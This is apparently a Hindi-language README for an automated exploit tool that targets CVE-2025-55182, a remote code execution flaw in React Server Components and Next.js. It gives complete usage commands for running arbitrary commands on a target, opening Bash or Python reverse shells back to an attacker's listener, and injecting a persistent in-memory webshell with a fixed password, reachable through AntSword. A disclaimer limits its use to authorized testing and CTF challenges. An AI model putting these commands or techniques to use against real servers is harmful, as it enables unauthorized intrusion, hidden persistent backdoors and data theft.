
CVE-2025-55182 (React/Next.js RCE) के लिए स्वचालित शोषण उपकरण, जिसमें कमांड निष्पादन, आउटबाउंड डिटेक्शन, इंटरैक्टिव रिवर्स शेल, और अधिकृत पेनिट्रेशन टेस्टिंग और CTF चुनौतियों के लिए स्थायी मेमोरी वेबशेल इंजेक्शन शामिल है।
लेखक: lamaper / BITs2Sys
संस्करण: 1.0.1
लाइसेंस: MIT
यह उपकरण विशेष रूप से CVE-2025-55182 (React Server Components / Next.js प्रोटोटाइप श्रृंखला प्रदूषण के कारण RCE) के लिए एक स्वचालित प्रवेश परीक्षण उपकरण है। यह उपकरण CTF प्रतियोगिताओं और अधिकृत सुरक्षा सेवा परियोजनाओं के लिए डिज़ाइन किया गया है, जिसमें कमजोरी सत्यापन, आउटबाउंड डिटेक्शन, रिवर्स शेल और मेमोरी शेल इंजेक्शन जैसी कई सुविधाएँ एकीकृत हैं।
--cmd) : NEXT_REDIRECT अपवाद तंत्र का उपयोग करके, Base64-एन्कोडेड कमांड निष्पादन परिणामों को सटीक रूप से वापस लाता है।--check-outbound) : लक्ष्य मशीन की DNS, HTTP और ICMP तक पहुंच का स्वचालित परीक्षण करता है, हमले के पथ निर्धारण में सहायता करता है।--shell) : Bash और Python3 दो रिवर्स मोड में अंतर्निहित, एसिंक्रोनस निष्पादन का समर्थन करता है, HTTP अनुरोधों को लटकने से रोकता है।--inject-ms) : Node.js http.Server ईवेंट वितरण तंत्र को अपहृत करके मेमोरी शेल इंजेक्ट करता है, कोई फ़ाइल अवशेष नहीं, स्थायी नियंत्रण का समर्थन करता है।--ms-cmd) : कमजोरी ट्रिगर पथ से स्वतंत्र इंटरैक्शन मोड, इंजेक्शन सफल होने के बाद सीधे बैकडोर के माध्यम से कमांड निष्पादित करता है।यह उपकरण Python 3 पर विकसित है, केवल requests लाइब्रेरी स्थापित करने की आवश्यकता है।
pip install requests
https://github.com/assetnote/react2shell-scanner एक बहुत उपयोगी जांच उपकरण है
सीधे लक्ष्य मशीन की जानकारी प्राप्त करें:
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"
रिवर्स शेल का प्रयास करने से पहले, पुष्टि करें कि लक्ष्य मशीन इंटरनेट से कनेक्ट हो सकती है:
python exploit.py --url http://target.com/ --check-outbound
Bash मोड:
# आक्रमण मशीन पर सुनें: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip <आपका IP> --port 4444
Python मोड:
python exploit.py --url http://target.com/ --shell python --ip <आपका IP> --port 4444
मेमोरी शेल इंजेक्ट करें:
python exploit.py --url http://target.com/ --inject-ms
मेमोरी शेल के माध्यम से कमांड निष्पादित करें (इंजेक्शन सफल होने के बाद उपयोग करें):
python exploit.py --url http://target.com/ --ms-cmd "whoami"
नोट: मेमोरी शेल का डिफ़ॉल्ट माउंट पथ /?pass है, POST के माध्यम से pwd पैरामीटर सबमिट करके ट्रिगर किया जाता है।
चीनी AntSword के माध्यम से कनेक्ट करें:
कनेक्शन पासवर्ड: pwd, कनेक्शन विधि: CMDLINUX
यह उपकरण केवल कानूनी रूप से अनुमत सुरक्षा अनुसंधान, CTF प्रतियोगिताओं और अधिकृत प्रवेश परीक्षण के लिए है। इसे अवैध हमलों के लिए उपयोग करना सख्त मना है। इस उपकरण का उपयोग करने से उत्पन्न सभी परिणाम उपयोगकर्ता की जिम्मेदारी हैं।